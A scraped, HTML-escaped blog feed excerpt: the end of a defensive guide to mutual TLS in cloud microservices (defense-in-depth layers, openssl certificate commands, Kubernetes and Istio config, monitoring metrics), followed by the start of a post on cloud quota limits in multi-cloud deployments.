&lt;strong&gt;Example&lt;/strong&gt;: "Cart Service can only receive traffic from API Gateway"&lt;/li&gt;
&lt;li&gt;Think of it as closing all doors and windows, then only opening specific ones&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Benefit&lt;/strong&gt;: Even before mTLS kicks in, most connections are blocked at the network level&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Layer 2: mTLS (Highlighted in red)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Service-to-service identity verification and encryption&lt;/li&gt;
&lt;li&gt;Even if network policy allows a connection, both services must authenticate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "I allow Cart Service to connect, but you must prove you ARE Cart Service"&lt;/li&gt;
&lt;li&gt;Prevents man-in-the-middle attacks and eavesdropping&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;This is the focus of this blog post&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Layer 3: Application Authentication (User Identity)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;JWT tokens, OAuth, or session cookies&lt;/li&gt;
&lt;li&gt;Validates that the end user is who they claim to be&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "The service calling me is authenticated (mTLS), but is the user's token valid?"&lt;/li&gt;
&lt;li&gt;mTLS proves the SERVICE identity, JWT proves the USER identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Real scenario&lt;/strong&gt;: Payment Service uses mTLS to verify it's talking to Order Service, then checks the JWT to verify the user has permission to make this purchase&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Layer 4: Authorization (Permission Check)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;RBAC (Role-Based Access Control) or ABAC (Attribute-Based Access Control)&lt;/li&gt;
&lt;li&gt;Even authenticated users shouldn't access everything&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "You're authenticated, but are you allowed to view THIS order?"&lt;/li&gt;
&lt;li&gt;Implements the principle of least privilege&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Real scenario&lt;/strong&gt;: User is authenticated (Layer 3), but can only view their own orders, not other customers' orders&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Layer 5: Audit Logging (Detection &amp;amp; Forensics)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;CloudTrail (AWS), Cloud Logging (GCP), Azure Monitor&lt;/li&gt;
&lt;li&gt;Records who did what, when, and from where&lt;/li&gt;
&lt;li&gt;Enables security investigations and compliance reporting&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Service X accessed Database Y at 2:15 PM using certificate Z"&lt;/li&gt;
&lt;li&gt;Helps detect anomalies and trace security incidents&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;How the layers work together:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Imagine an attacker tries to steal customer data:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Layer 1 blocks&lt;/strong&gt;: Network policy prevents random pods from accessing the database&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 2 blocks&lt;/strong&gt;: Without a valid certificate, can't establish mTLS connection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 3 blocks&lt;/strong&gt;: Even with a certificate, need a valid user JWT token&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 4 blocks&lt;/strong&gt;: Even with authentication, authorization check fails ("you can't access this data")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 5 detects&lt;/strong&gt;: All failed attempts are logged for security team review&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;An attacker must bypass ALL layers to succeed.&lt;/strong&gt; This is why it's called "defense in depth" - multiple independent security controls that work together.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-world example - compromised service:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let's say an attacker compromises the Product Service:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Layer 1&lt;/strong&gt;: NetworkPolicy prevents Product Service from connecting to Order DB (it shouldn't need to)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 2&lt;/strong&gt;: Product Service doesn't have certificates for Order Service or Payment Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 3&lt;/strong&gt;: Product Service can't forge JWT tokens for users&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 4&lt;/strong&gt;: Even if it could connect, authorization rules prevent it from accessing order data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 5&lt;/strong&gt;: Any suspicious behavior is logged and alerted&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The compromise is contained to just the Product Service - the attacker can't pivot to sensitive financial data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why mTLS alone isn't enough:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;mTLS proves service identity, but not user authorization&lt;/li&gt;
&lt;li&gt;A compromised service with valid certificates could still abuse its access&lt;/li&gt;
&lt;li&gt;Multiple layers provide redundancy - if one fails, others still protect you&lt;/li&gt;
&lt;li&gt;Each layer addresses different threat vectors&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This layered approach is the industry standard for securing cloud applications and is required for compliance with standards like PCI DSS, SOC 2, and HIPAA.&lt;/p&gt;
&lt;h2&gt;
  
  
  Getting Started: Step-by-Step
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Step 1: Set Up a Certificate Authority
&lt;/h3&gt;

&lt;p&gt;Choose between:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cloud-native&lt;/strong&gt;: AWS Private CA, GCP Certificate Authority Service, Azure Key Vault&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Self-hosted&lt;/strong&gt;: HashiCorp Vault, cert-manager (Kubernetes)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managed service mesh&lt;/strong&gt;: Istio CA, Linkerd CA&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Step 2: Generate Certificates
&lt;/h3&gt;

&lt;p&gt;For a service:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Example: Generate a certificate request&lt;/span&gt;
openssl req &lt;span class="nt"&gt;-new&lt;/span&gt; &lt;span class="nt"&gt;-newkey&lt;/span&gt; rsa:2048 &lt;span class="nt"&gt;-nodes&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-keyout&lt;/span&gt; service-a.key &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-out&lt;/span&gt; service-a.csr &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-subj&lt;/span&gt; &lt;span class="s2"&gt;"/CN=service-a.default.svc.cluster.local"&lt;/span&gt;

&lt;span class="c"&gt;# Sign with CA&lt;/span&gt;
openssl x509 &lt;span class="nt"&gt;-req&lt;/span&gt; &lt;span class="nt"&gt;-in&lt;/span&gt; service-a.csr &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-CA&lt;/span&gt; ca.crt &lt;span class="nt"&gt;-CAkey&lt;/span&gt; ca.key &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-out&lt;/span&gt; service-a.crt &lt;span class="nt"&gt;-days&lt;/span&gt; 365
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Configure Your Services
&lt;/h3&gt;

&lt;p&gt;Example Kubernetes configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Secret&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;service-a-certs&lt;/span&gt;
&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kubernetes.io/tls&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;tls.crt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;&amp;lt;base64-encoded-cert&amp;gt;&lt;/span&gt;
  &lt;span class="na"&gt;tls.key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;&amp;lt;base64-encoded-key&amp;gt;&lt;/span&gt;
  &lt;span class="na"&gt;ca.crt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;&amp;lt;base64-encoded-ca&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 4: Enable mTLS in Your Service Mesh
&lt;/h3&gt;

&lt;p&gt;Example Istio configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;security.istio.io/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;PeerAuthentication&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;mtls&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;STRICT&lt;/span&gt;  &lt;span class="c1"&gt;# Enforce mTLS for all services&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Monitoring and Troubleshooting
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Key Metrics to Monitor
&lt;/h3&gt;

&lt;p&gt;Effective mTLS requires comprehensive monitoring. Here are the critical metrics organized by category:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fst9t8509a5ppri80wtm6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fst9t8509a5ppri80wtm6.png" alt="key metrics to monitor" width="800" height="82"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Certificate Health Metrics - Proactive Monitoring:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;M1: Days Until Expiration&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Track how many days remain until each certificate expires&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Minimum expiration time across all certificates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Prevents service outages from expired certificates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Alert threshold&lt;/strong&gt;: Less than 7 days (highlighted in red)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Best practice&lt;/strong&gt;: With 24-hour certificates, this should never trigger if auto-rotation works&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example alert&lt;/strong&gt;: "Payment Service certificate expires in 6 days - rotation may be failing"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M2: Failed Validations&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Count how many times certificate validation fails&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Rate of validation failures per service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Indicates certificate issues, CA problems, or misconfiguration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Alert threshold&lt;/strong&gt;: Any increase from baseline (orange alert)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Common causes&lt;/strong&gt;: Clock skew, expired CA certificates, network issues reaching CA&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "User Service failing to validate Order Service certificate - CA unreachable"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M3: Rotation Success Rate&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Percentage of successful certificate rotations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Success rate over time, broken down by service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Ensures automation is working properly&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Target&lt;/strong&gt;: Should be 99.9%+ for production systems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What can go wrong&lt;/strong&gt;: CA outages, permission issues, secret store unavailable&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Cart Service rotation success rate dropped to 95% - investigate"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Connection Metrics - Performance and Reliability:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;M4: TLS Handshake Duration&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Time taken to complete the mTLS handshake&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: P50, P95, P99 latency percentiles&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Slow handshakes impact user experience&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Typical values&lt;/strong&gt;: 1-5ms for local services, 10-50ms for cross-region&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Red flags&lt;/strong&gt;: Sudden increases indicate CA problems or network issues&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Handshake duration increased from 2ms to 50ms - CA performance degraded"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M5: Connection Failures&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Number of failed mTLS connection attempts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Failure rate and absolute count&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Alert threshold&lt;/strong&gt;: Any spike above baseline (orange alert)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: May indicate service outages, certificate problems, or attacks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Investigation steps&lt;/strong&gt;: Check certificate validity, network connectivity, CA availability&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "100 failed connections to Payment Service in last 5 minutes - investigating"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M6: Certificate Errors&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Specific types of certificate-related errors&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Error categories (expired, invalid signature, wrong hostname, revoked)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Different errors require different fixes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Common errors&lt;/strong&gt;:

&lt;ul&gt;
&lt;li&gt;"Certificate expired": Rotation failed&lt;/li&gt;
&lt;li&gt;"Invalid signature": Certificate doesn't match CA&lt;/li&gt;
&lt;li&gt;"Hostname mismatch": Wrong certificate for this service&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Example&lt;/strong&gt;: "Payment Service receiving 'hostname mismatch' errors - certificate issued for wrong domain"&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Security Metrics - Threat Detection:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;M7: Unauthorized Access Attempts&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Services or clients trying to connect without valid certificates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Source of attempts, target services, frequency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Alert threshold&lt;/strong&gt;: Immediate alert (red - highest priority)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Indicates potential security breach or misconfiguration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Action required&lt;/strong&gt;: Investigate immediately - could be an active attack&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Unknown service attempting to connect to Payment Service - no valid certificate"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M8: Certificate Revocations&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Certificates that have been revoked before expiration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Number and reason for revocations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Indicates security incidents or compromised services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Common reasons&lt;/strong&gt;: Key compromise, service decommissioned, security policy violation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Cart Service certificate revoked due to suspected key exposure"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M9: Cipher Suite Usage&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Which encryption algorithms are being used&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Distribution of cipher suites across connections&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Weak ciphers indicate security vulnerabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Best practice&lt;/strong&gt;: Only allow TLS 1.3 with modern cipher suites&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Red flags&lt;/strong&gt;: TLS 1.0/1.1, weak ciphers like RC4 or 3DES&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "10% of connections using deprecated TLS 1.2 - update client configurations"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Setting Up Alerts - Priority Levels:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;IMMEDIATE (Red):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Unauthorized access attempts (M7)&lt;/li&gt;
&lt;li&gt;Security incidents requiring immediate response&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Response time&lt;/strong&gt;: Within minutes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example action&lt;/strong&gt;: Page security team, potentially block traffic&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;HIGH (Orange):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Certificate expiring in &amp;lt;7 days (M1)&lt;/li&gt;
&lt;li&gt;Failed validations increasing (M2)&lt;/li&gt;
&lt;li&gt;Connection failure spike (M5)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Response time&lt;/strong&gt;: Within hours&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example action&lt;/strong&gt;: Investigate root cause, trigger manual rotation if needed&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;MEDIUM (Yellow):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Rotation success rate dropping&lt;/li&gt;
&lt;li&gt;Handshake duration increasing&lt;/li&gt;
&lt;li&gt;Certificate errors appearing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Response time&lt;/strong&gt;: Within business day&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example action&lt;/strong&gt;: Review logs, identify configuration issues&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Monitoring Tools:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prometheus + Grafana&lt;/strong&gt;: Popular open-source stack&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Datadog / New Relic&lt;/strong&gt;: Commercial APM solutions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud-native&lt;/strong&gt;: CloudWatch (AWS), Cloud Monitoring (GCP), Azure Monitor&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Service mesh built-in&lt;/strong&gt;: Istio, Linkerd provide metrics out-of-box&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Dashboard Example:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A good mTLS dashboard shows:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Certificate expiration timeline (all certs visualized)&lt;/li&gt;
&lt;li&gt;Connection success rate (should be &amp;gt;99.9%)&lt;/li&gt;
&lt;li&gt;Handshake latency over time&lt;/li&gt;
&lt;li&gt;Alert history and current active alerts&lt;/li&gt;
&lt;li&gt;Per-service breakdown of all metrics&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;By monitoring these metrics, you can catch problems before they cause outages and detect security incidents in real-time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Common Issues and Solutions
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Certificate expired&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Solution&lt;/strong&gt;: Implement automated rotation with alerts 30 days before expiry&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Certificate chain validation fails&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Solution&lt;/strong&gt;: Ensure CA certificate is properly distributed to all services&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Performance degradation&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Solution&lt;/strong&gt;: Use session resumption, optimize cipher suites, consider hardware acceleration&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Mutual TLS is no longer optional in modern cloud environments. It provides strong authentication, encryption, and forms the foundation of zero-trust architectures. While it adds complexity, cloud-native tools like service meshes and managed certificate authorities make implementation practical and manageable.&lt;/p&gt;

&lt;p&gt;Start small: implement mTLS for your most sensitive service-to-service communications first, then gradually expand coverage as your team gains experience. The security benefits far outweigh the initial investment in setup and learning.&lt;/p&gt;

&lt;h2&gt;
  
  
  Additional Resources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://istio.io/latest/docs/concepts/security/" rel="noopener noreferrer"&gt;Istio mTLS Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/app-mesh/latest/userguide/mutual-tls.html" rel="noopener noreferrer"&gt;AWS App Mesh mTLS Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/service-mesh/docs/security/security-overview" rel="noopener noreferrer"&gt;Google Cloud Service Mesh Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cert-manager.io/" rel="noopener noreferrer"&gt;cert-manager for Kubernetes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/sp/800-52/rev-2/final" rel="noopener noreferrer"&gt;NIST Guidelines on TLS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Ready to implement mTLS in your cloud environment? Start by evaluating your current service-to-service communication patterns and identifying high-value targets for mTLS implementation.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at - &lt;a href="https://platformwale.blog/" rel="noopener noreferrer"&gt;https://platformwale.blog/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>kubernetes</category>
      <category>cloud</category>
      <category>distributedsystems</category>
    </item>
    <item>
      <title>Navigating the Hidden Minefield: Cloud Quotas and Infrastructure Deployment Delays</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sun, 01 Feb 2026 15:27:58 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/navigating-the-hidden-minefield-cloud-quotas-and-infrastructure-deployment-delays-54hm</link>
      <guid>https://dev.to/piyushjajoo/navigating-the-hidden-minefield-cloud-quotas-and-infrastructure-deployment-delays-54hm</guid>
      <description>&lt;p&gt;Every cloud engineer has been there. Your infrastructure-as-code is perfect, your deployment pipeline is green, stakeholders are waiting, and then you hit the wall: "Quota exceeded for resource 'CPUS' in region 'us-east-1'." What should have been a 20-minute deployment turns into days of delays, escalations, and frantic quota requests. In multi-cloud environments, this problem multiplies exponentially.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Cost of Quota Surprises
&lt;/h2&gt;

&lt;p&gt;Quota limits are cloud providers' way of preventing runaway costs, abuse, and ensuring fair resource distribution. But when you're unprepared, they become deployment blockers that cascade through your entire delivery timeline. A quota issue isn't just a technical hiccup—it's a business risk that can derail product launches, delay critical features, and erode stakeholder confidence.&lt;/p&gt;

&lt;p&gt;In single-cloud environments, this is manageable. In multi-cloud environments where you're orchestrating resources across AWS, Azure, and Google Cloud simultaneously, quota issues become a coordination nightmare. Each provider has different quota structures, request processes, and approval timelines.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Quota Issues Are Particularly Painful in Multi-Cloud
&lt;/h2&gt;

&lt;p&gt;Multi-cloud strategies introduce several quota-related complications that single-cloud deployments don't face:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Different quota models across providers.&lt;/strong&gt; AWS uses service quotas with soft and hard limits. Azure implements subscription-level quotas with regional variations. Google Cloud has project-level and per-region quotas. Each provider calculates resources differently—what counts as a single vCPU in AWS might be calculated differently in Azure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Inconsistent approval timelines.&lt;/strong&gt; AWS Service Quotas can sometimes be auto-approved for certain increases, taking minutes. Azure quota increases might require 24-48 hours. Google Cloud quota requests can take several business days depending on the resource type. When your deployment spans all three clouds, you're only as fast as the slowest approval.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lack of unified visibility.&lt;/strong&gt; There's no single pane of glass showing your quota utilization across clouds. You need separate monitoring for AWS Service Quotas, Azure subscription limits, and Google Cloud quotas. This fragmentation makes it nearly impossible to get a holistic view of your capacity headroom.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Regional fragmentation.&lt;/strong&gt; Each cloud region has independent quotas. Your multi-cloud disaster recovery strategy might require deploying across six regions spanning three providers—that's 18+ different quota contexts to manage.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Quota Bottlenecks That Derail Deployments
&lt;/h2&gt;

&lt;p&gt;Based on real-world experience, here are the quotas most likely to cause deployment delays:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Compute resources&lt;/strong&gt; are the number one culprit. Standard vCPU quotas, spot instance limits, and GPU quotas frequently block deployments. A Kubernetes cluster expansion that needs 200 additional vCPUs can grind to a halt if you only have 50 vCPUs of quota headroom.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Networking quotas&lt;/strong&gt; are often overlooked until it's too late. VPCs, subnets, elastic IPs, load balancers, NAT gateways, and VPN connections all have limits. In AWS, the default limit of 5 VPCs per region seems generous until you're implementing a hub-and-spoke network architecture.&lt;/p&gt;

